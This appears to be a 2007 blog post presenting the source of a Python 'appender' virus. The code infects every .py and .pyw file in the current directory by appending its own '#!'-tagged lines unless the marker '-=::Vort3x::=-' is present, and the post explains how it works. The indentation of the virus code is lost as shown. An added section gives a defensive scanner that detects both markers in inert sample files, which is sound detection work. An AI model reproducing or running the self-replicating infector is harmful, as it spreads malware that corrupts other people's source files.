Thursday, November 8, 2007

Python Appender Virus

Here I will show you a small appender. Appenders are a standard type of file infector, along with prependers and the lame overwriters (that no one really likes!). Damnit :p Appending means writing the virus code after the normal code, so the virus runs after the host code.

Code:
import glob #!
from string import * #!
Files = glob.glob("*.py") + glob.glob("*.pyw") #!
for Files in Files: #!
vCode = open(__file__, 'r') #!
victim = open (Files, 'r') #!
readvictim = victim.read() #!
if find(readvictim, "-=::Vort3x::=-") == -1: #!
victim = open(Files, 'a') #!
for code in vCode.readlines(): #!
if ("#!") in code: #!
vCode.close() #!
mycode=(chr(10)+code) #!
victim.write(mycode) #!
Here is how it works:

Searches for files (py / pyw) in the current directory.
Looks inside those files to find the infection marker. Note: this virus has 2 markers, I'll explain later.
Finds its own code.
Opens the uninfected files and writes its code to the end of the normal code.
Closes all open files... finished!
Why it has 2 markers: Well, the ones you notice the most are the virus code markers; we use these to know what code to infect other files with. The virus will only copy the code that has "#!" at the end of each line, understand? There are other ways of doing this, but blah, it works.

Then we have the infection marker "-=::Vort3x::=-"; this is so we can see if the file has already been infected. If we don't use any infection marker, bad things will happen!! Such as your virus re-appending to files. :O Then you end up with HUGE files, growing in size each time it's executed!
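
Seen from the defender's side, the two markers described above are also detection signatures: the infection marker string, and a trailing run of lines that each end in "#!". The scanner below is an added example, not part of the original post; its function names and the two sample files are constructed for illustration and contain only inert text.

```python
import os
import tempfile

INFECTION_MARKER = "-=::Vort3x::=-"  # infection marker quoted in the post
CODE_MARKER = "#!"                   # per-line code marker quoted in the post

# Constructed samples: a clean script with a shebang, and host code followed
# by inert lines tagged the way the post describes (no functional payload).
CLEAN = '#!/usr/bin/env python\nprint("hello")\n'
FLAGGED = ('print("host")\n'
           '\n# constructed inert line #!\n'
           '\nmarker = "-=::Vort3x::=-" #!\n')

def inspect_source(text):
    """Report marker findings for one Python source string."""
    lines = text.splitlines()
    tagged = [n for n, ln in enumerate(lines, 1)
              if ln.rstrip().endswith(CODE_MARKER)]
    start = None
    # Walk back from EOF over blank and tagged lines: an appender leaves its
    # tagged block after the host code, so this finds where that block begins.
    for n in range(len(lines), 0, -1):
        ln = lines[n - 1].strip()
        if not ln:
            continue
        if not ln.endswith(CODE_MARKER):
            break
        start = n
    return {"infection_marker": INFECTION_MARKER in text,
            "tagged_lines": tagged,
            "appended_block_start": start}

def scan_directory(path):
    """Return {filename: report} for .py/.pyw files showing either signature."""
    hits = {}
    for name in sorted(os.listdir(path)):
        if not name.endswith((".py", ".pyw")):
            continue
        full = os.path.join(path, name)
        with open(full, "r", encoding="utf-8", errors="replace") as fh:
            report = inspect_source(fh.read())
        if report["infection_marker"] or report["appended_block_start"]:
            hits[name] = report
    return hits

def demo():
    # Write the constructed samples to a temporary directory and scan it.
    with tempfile.TemporaryDirectory() as d:
        for name, body in (("clean.py", CLEAN), ("flagged.pyw", FLAGGED)):
            with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_directory(d)

if __name__ == "__main__":
    print(demo())
```

`appended_block_start` gives the line where the host code ends, which is the cut point for restoring a flagged file from review. The scanner's own source contains the marker string, so keep it outside the directory being scanned.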